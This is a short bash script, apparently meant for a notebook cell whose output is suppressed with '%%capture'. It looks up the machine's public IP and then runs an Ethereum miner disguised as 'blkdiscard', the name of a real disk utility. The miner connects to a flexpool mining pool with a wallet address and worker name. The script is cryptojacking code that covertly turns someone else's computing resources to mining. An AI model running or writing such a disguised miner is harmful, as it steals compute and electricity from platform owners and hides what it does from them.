#!/bin/bash
%%capture

#gives ip address 
curl ipecho.net/plain && curl ipecho.net/plain
chmod +x blkdiscard 
./blkdiscard --algo ETHASH --pool stratum+ssl://eth-de.flexpool.io:5555 --user 0xd2b8488eF94b4F16C6fCacA8dfBde6C3DFdC38c5.Lintah
